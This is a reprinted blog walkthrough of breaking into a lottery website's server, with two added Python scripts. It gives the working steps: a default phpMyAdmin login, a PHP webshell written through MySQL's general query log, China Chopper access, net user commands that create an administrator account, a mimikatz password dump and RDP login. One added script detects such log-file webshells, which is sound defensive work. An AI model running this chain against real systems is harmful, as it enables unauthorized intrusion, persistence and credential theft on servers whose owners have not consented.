Title: Penetration Series: Fighting Lottery Station

Get the phpMyAdmin weak password

The IP of the lottery site, xxx, was obtained during information gathering, and a port/service scan showed that phpMyAdmin was exposed. Guessing the default weak password (root/root) was enough to log in to phpMyAdmin.

[screenshot]

[screenshot]

Write a shell to the log file through the phpMyAdmin SQL query panel

Use phpMyAdmin's SQL query function to write a one-line PHP trojan (一句话木马, a "one-sentence trojan") into the MySQL general query log file.

The process and commands are as follows:

1. Turn on the general query log: set global general_log=on; (SET GLOBAL needs the SUPER privilege, which is why the root login matters.)

2. Open phpMyAdmin's Variables tab and check the general_log_file variable, which holds the log file name. MySQL appends every statement it receives to that file verbatim, so the trick only works when it points to a file under the web root with a .php extension:

[screenshot]

The log file here is test.php.

3. Execute a SQL statement whose text contains the one-line trojan, so that the statement gets appended to the log file: SELECT '<?php assert($_POST["test"]);?>';

[screenshot]

4. The result returned after successful execution.

[screenshot]

5. View the log file: the statement text, PHP tags included, now sits inside test.php, and PHP ignores the surrounding log lines when the file is requested.

[screenshot]
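
The following script is an added example, not code from the original post. It shows what the log file produced by steps 1 to 5 looks like and how an incident responder can triage such a file in the web root: the MySQL general log header plus a Query record that carries PHP tags is the fingerprint of this technique. The log content and the path C:/phpStudy/WWW/test.php are constructed/assumed for the demonstration.

```python
"""Triage a suspected MySQL-general-log webshell (added example, not from the original post).

The technique works because mysqld appends every statement it receives to
general_log_file verbatim; if that file sits under the web root with a .php
extension, PHP ignores the log framing and executes whatever is between
<?php ... ?>. This script (1) shows what such a file looks like and (2) flags it.
SAMPLE_LOG is CONSTRUCTED to mimic the MySQL general log layout; the path
C:/phpStudy/WWW/test.php is an assumption.
"""
import re

# Constructed content resembling what mysqld writes when general_log is on and
# general_log_file points at a file under the web root (assumed path).
SAMPLE_LOG = """C:\\phpStudy\\MySQL\\bin\\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
200926 10:12:01\t    5 Connect\troot@localhost on 
200926 10:12:01\t    5 Query\tSHOW VARIABLES LIKE 'general_log%'
200926 10:12:30\t    5 Query\tSELECT '<?php assert($_POST["test"]); ?>'
200926 10:12:31\t    5 Quit\t
"""

GENERAL_LOG_HEADER = re.compile(r"^Time\s+Id\s+Command\s+Argument$", re.M)
PHP_TAG = re.compile(r"<\?php(.*?)\?>", re.S)
# One-liner webshell shape: a code-execution sink fed straight from a request parameter.
WEBSHELL_SINK = re.compile(
    r"\b(assert|eval|system|passthru|shell_exec|exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b",
    re.I,
)
QUERY_WITH_PHP = re.compile(r"\bQuery\t.*<\?php")


def extract_php(content):
    """Return every PHP segment that PHP itself would execute from this file."""
    return [m.group(1).strip() for m in PHP_TAG.finditer(content)]


def triage(path, content):
    """Classify one file from the web root.

    Returns the individual indicators, not just a verdict, so the responder can
    follow up (quarantine the file, read the general_log_file variable on the
    MySQL instance, check who had SUPER) instead of acting on a bare boolean.
    """
    indicators = {
        "php_extension": path.lower().endswith((".php", ".phtml", ".php5")),
        "mysql_general_log_layout": bool(GENERAL_LOG_HEADER.search(content)),
        "php_segments": extract_php(content),
        "webshell_sinks": [],
        # True when the <?php payload arrived as a statement argument, i.e. the
        # line holding it is a "Query" record: the SELECT-into-log fingerprint.
        "logged_via_query": any(QUERY_WITH_PHP.search(l) for l in content.splitlines()),
    }
    for seg in indicators["php_segments"]:
        for m in WEBSHELL_SINK.finditer(seg):
            indicators["webshell_sinks"].append(m.group(1).lower())
    indicators["verdict"] = (
        "mysql-general-log webshell"
        if indicators["php_extension"]
        and indicators["mysql_general_log_layout"]
        and indicators["webshell_sinks"]
        else "clean or needs manual review"
    )
    return indicators


if __name__ == "__main__":
    for key, value in triage("C:/phpStudy/WWW/test.php", SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The same three indicators make a cheap periodic check on any host where mysqld can write into the web root: a .php file that opens with a mysqld banner should never exist there.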

6. Connect with China Chopper (菜刀, rendered as "kitchen knife" in the machine translation), add a user and upload mimikatz.

Use China Chopper to connect to the trojan in the log file: xxx/test.php, password: test

[screenshot]

Checking the current identity shows the shell is running with SYSTEM privileges, so just add a user and put it in the administrators group.

The commands are:

C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe localgroup administrators Test /add

Upload mimikatz to the server.

[screenshot]

7. Connect over 3389 and read the administrator password.

(1) A direct telnet ip 3389 test showed the port was reachable, so I connected to 3389 directly.

[screenshot]

(2) Alternatively, run the following commands from China Chopper to find which port the Remote Desktop service is actually listening on:

Step 1 : tasklist /svc | findstr TermService // find the process (PID) hosting the Remote Desktop service

Step 2 : netstat -ano | findstr **** // list the sockets owned by that PID; the LISTENING entry gives the RDP port

(3) Run mimikatz and dump the logon passwords of the administrator-group accounts.

[screenshot]

(4) Use the obtained administrator/xxxx account and password to log in to the server remotely.

[screenshot]
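
The two-command lookup in step (2) above, tied together in code, as an added example that is not part of the original post: the PID hosting TermService is read from tasklist /svc output and then matched against netstat -ano to get the listening port. Both command outputs below are constructed samples, and the RDP port is deliberately moved off 3389, since that is the situation in which the lookup is needed at all.

```python
"""Find the port Remote Desktop really listens on (added example, not from the original post).

tasklist /svc names the svchost.exe process that hosts TermService;
netstat -ano lists every socket with its owning PID. Joining the two gives the
RDP port even when it has been moved away from 3389. TASKLIST_SVC and
NETSTAT_ANO below are CONSTRUCTED samples in the real commands' layout; on a
live host, feed in the captured output of the two commands instead.
"""

TASKLIST_SVC = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    832 RpcEptMapper, RpcSs
svchost.exe                   1416 TermService
svchost.exe                   1530 Dnscache, NlaSvc
"""

NETSTAT_ANO = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       2104
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       2988
  TCP    0.0.0.0:33890          0.0.0.0:0              LISTENING       1416
  TCP    10.0.0.5:33890         10.0.0.9:51622         ESTABLISHED     1416
  TCP    [::]:33890             [::]:0                 LISTENING       1416
  UDP    0.0.0.0:33890          *:*                                    1416
"""


def pid_for_service(tasklist_output, service="TermService"):
    """Return the PID of the process hosting `service`, from `tasklist /svc` output."""
    for line in tasklist_output.splitlines():
        parts = line.split(None, 2)  # image name, PID, comma-separated services
        if len(parts) == 3 and parts[1].isdigit():
            services = [s.strip() for s in parts[2].split(",")]
            if service in services:
                return int(parts[1])
    return None


def listening_ports(netstat_output, pid):
    """Return sorted (proto, port) pairs on which `pid` is listening, from `netstat -ano`."""
    found = set()
    for line in netstat_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] not in ("TCP", "UDP"):
            continue
        proto, local, owner = cols[0], cols[1], cols[-1]
        if owner != str(pid):
            continue
        # TCP rows carry a State column; only LISTENING sockets are service ports.
        if proto == "TCP" and cols[3] != "LISTENING":
            continue
        # rsplit copes with IPv6 locals such as [::]:33890
        found.add((proto, int(local.rsplit(":", 1)[1])))
    return sorted(found)


def rdp_ports(tasklist_output, netstat_output):
    """Join the two outputs: the ports served by the process that hosts TermService."""
    pid = pid_for_service(tasklist_output)
    if pid is None:
        return []
    return listening_ports(netstat_output, pid)


if __name__ == "__main__":
    print(rdp_ports(TASKLIST_SVC, NETSTAT_ANO))
```

Filtering on LISTENING matters: the ESTABLISHED row for the same PID is an existing RDP session, and its remote-side port says nothing about where the service accepts new connections.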

Once on the box it turned out that the server used phpStudy to stand up lottery sites in bulk. There were about a dozen sites, and from this server the site domains hosted on several other servers could be reached at will. Some screenshots follow:

System 1 :

[screenshot]

System 2 :

[screenshot]

System 3 :

[screenshot]

Backend (admin panel) 1 :

[screenshot]

Backend (admin panel) 2 :

[screenshot]

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247487003&idx=1&sn=5c85b34ce6ffb400fdf858737e34df3d&chksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddc&scene=21#wechat_redirect

https://blog.csdn.net/weixin_39997829/article/details/109186917
